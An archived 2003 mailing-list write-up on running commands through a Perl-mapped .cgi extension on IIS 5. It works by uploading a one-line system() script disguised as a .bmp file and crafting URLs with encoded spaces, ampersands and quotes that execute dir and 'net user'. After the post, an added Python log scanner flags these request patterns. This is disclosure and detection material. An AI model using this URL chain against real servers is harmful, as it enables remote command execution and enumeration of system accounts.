
The Building Of An Exploit String

From: Brett Moore <brett(at)softwarecreations.co.nz>
Date: Wed Feb 26 2003 - 21:01:04 EST



The Building Of An Exploit String
- Exploiting The PERL Under IIS

PERL v5.6.1 built for MSWin32-x86
http://www.perl.com/
http://www.activestate.com

The problems highlighted in this writeup are not directly related to the use of Perl; rather, they illustrate some of the possibilities when weaknesses in file uploading and directory permissions are abused. It is highly likely that these techniques could be used against other command line interpreters.

I recently audited a package that used the perl.exe interpreter on a Windows 2000 server running IIS 5.

Under Application Configuration in the IIS management console, the .cgi extension is mapped as: c:/APP/perl/bin/perl.exe %s

This allows us access to the perl executable through the use of a cgi extension.

example: http://192.168.1.1/web/test.cgi
result: Can't open perl script "C:\APP\web\test.cgi": No such file or directory

This is obviously a path disclosure issue.

All attempts to pass parameters to perl.exe fail.


example: http://192.168.1.1/web/-h.cgi
result: Can't open perl script "C:\APP\web\-h.cgi": No such file or directory

It seems that IIS is passing the full path to the interpreter.

So what we required was the ability to create a file on the server and then pass that file to the perl interpreter.

This particular application allowed uploading of files with a .bmp extension, so we created a small perl script:

        system(@ARGV);

and uploaded it as system.bmp. This file was uploaded to the folder

        c:/APP/web/data/

IIS will only pass the file to the perl interpreter if it has a .cgi extension, which our uploaded file doesn't have.


example: http://192.168.1.1/web/data/system.bmp.cgi
result: Can't open perl script "C:\APP\web\data\system.bmp.cgi": No such file or directory

By placing a %20 (space) or %09 (tab) between the .bmp and the .cgi we are able to force the interpreter to execute our script.

example: http://192.168.1.1/web/data/system.bmp%20.cgi
result: '.cgi' is not recognized as an internal or external command,
        operable program or batch file.

The system command inside our uploaded file is executing and using the .cgi as the argv parameter.

Any arguments placed before the %20.cgi will be used by our system call.

example: http://192.168.1.1/web/data/system.bmp%20dir%20.cgi
result: This will result in a request to open or save to disk.


Appending a ? to the end of the url will prevent the open/save to disk request.

example: http://192.168.1.1/web/data/system.bmp%20dir%20.cgi?
result: Directory of C:\APP\web

        File Not Found

This results in a File Not Found message because our script is running

        system("dir .cgi?")

This is easily avoided by inserting an & (ampersand) character after the last argument and before the %20.cgi

example: http://192.168.1.1/web/data/system.bmp%20dir%20&%20.cgi?
result:
        Directory of C:\APP\web

        02/12/2003  09:21a                .
        02/12/2003  09:21a                ..
        02/12/2003  01:35a                  15 a.pl
        02/12/2003  12:36a                bin
        02/12/2003  12:36a                 206 default.htm
        etc..
                      10 File(s)         17,165 bytes
                       6 Dir(s)  52,390,678,528 bytes free
        '.cgi' is not recognized as an internal or external command,
        operable program or batch file.

The script will now run system("dir & .cgi?"), which cmd.exe interprets as two separate DOS commands.

This will not work when attempting to run executable files.

example: http://192.168.1.1/web/data/system.bmp%20net%20user%20&%20%20.cgi?
result: More help is available by typing NET HELPMSG 2221.

example: http://192.168.1.1/web/data/system.bmp%20net%20use%20&%20%20.cgi?
result: The network name cannot be found.

This is caused by cmd.exe interpreting the 'user & .cgi' part of the string as the parameter to pass to net.exe. This results in a call to "net user & .cgi", which is invalid.

By placing " (double quotes) around our net.exe call we can modify the way that cmd.exe will interpret the string.

example:
http://192.168.1.1/web/data/system.bmp%20"net%20user"%20&%20%20.cgi?

result:	------------------------------------------------------------
	Administrator            Guest                    IUSR_BLACKHOLE
	IWAM_BLACKHOLE           NetShowServices          TsInternetUser
	VUSR_BLACKHOLE
	The command completed with one or more errors.


	'.cgi' is not recognized as an internal or external command,
	operable program or batch file.

The '.cgi' error is still shown here because '.cgi' is still being interpreted as a command. By adding a final command and redirecting its output to a writable file space, we can have this error removed.


example:
http://192.168.1.1/web/data/system.bmp%20"net%20user"%20&%20dir%20>%20\a.cgi?

result:	------------------------------------------------------------
	Administrator            Guest                    IUSR_BLACKHOLE
	IWAM_BLACKHOLE           NetShowServices          TsInternetUser
	VUSR_BLACKHOLE
	The command completed with one or more errors.

..
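From the defender's side, the whole chain above leaves a recognisable trace in the web server log: a request whose URI stem ends in .cgi but carries encoded whitespace, a second extension such as .bmp, or cmd.exe metacharacters (&, >, ") ahead of that .cgi. The following scanner is an added example, not code from the original post; it works over constructed W3C-style log lines and assumes the field order date, time, c-ip, cs-method, cs-uri-stem, cs-uri-query, sc-status.

```python
"""Flag IIS requests matching the 'system.bmp%20.cgi' pattern described in the writeup."""
import re
from urllib.parse import unquote

# Constructed log lines for this example (W3C order assumed: date time c-ip
# cs-method cs-uri-stem cs-uri-query sc-status). The stems are still URL-encoded.
SAMPLE_LOG = """\
2003-02-26 21:01:04 10.0.0.5 GET /web/test.cgi - 500
2003-02-26 21:01:09 10.0.0.5 GET /web/data/system.bmp%20.cgi - 200
2003-02-26 21:01:15 10.0.0.5 GET /web/data/system.bmp%20dir%20&%20.cgi ? 200
2003-02-26 21:01:22 10.0.0.5 GET /web/data/system.bmp%20"net%20user"%20&%20dir%20>%20\\a.cgi ? 200
2003-02-26 21:02:00 10.0.0.9 GET /web/data/logo.bmp - 200
2003-02-26 21:02:03 10.0.0.9 GET /web/index.cgi id=3 200
"""

# Characters cmd.exe treats specially once the string reaches system()
SHELL_META = set('&|>"<')


def analyze_stem(stem):
    """Return the reasons a cs-uri-stem looks like the bypass; empty list if clean."""
    decoded = unquote(stem)           # %20 -> ' ', %09 -> '\t', %22 -> '"'
    if not decoded.lower().endswith('.cgi'):
        return []                     # only the mapped extension reaches perl.exe
    body = decoded[:-4]               # everything ahead of the trailing '.cgi'
    reasons = []
    if re.search(r'[ \t]', body):
        reasons.append('whitespace before .cgi')
    # An earlier extension followed by whitespace means an uploaded file is
    # being fed to the interpreter under a borrowed .cgi suffix.
    if re.search(r'\.[A-Za-z0-9]{1,4}[ \t]', body):
        reasons.append('double extension')
    meta = sorted(ch for ch in SHELL_META if ch in body)
    if meta:
        reasons.append('shell metacharacters ' + ''.join(meta))
    return reasons


def scan_log(text):
    """Parse W3C-style lines and return (stem, reasons) for every flagged request."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 7:
            continue
        stem = fields[4]
        reasons = analyze_stem(stem)
        if reasons:
            hits.append((stem, reasons))
    return hits


if __name__ == '__main__':
    for stem, reasons in scan_log(SAMPLE_LOG):
        print(stem, '->', '; '.join(reasons))
```

Requests that legitimately hit a .cgi script (the first and last sample lines) produce no findings, so the rule can run over a whole day of logs without flagging normal traffic to the mapped extension.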



Received on Thu Feb 27 12:36:56 2003

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:02:33 EDT
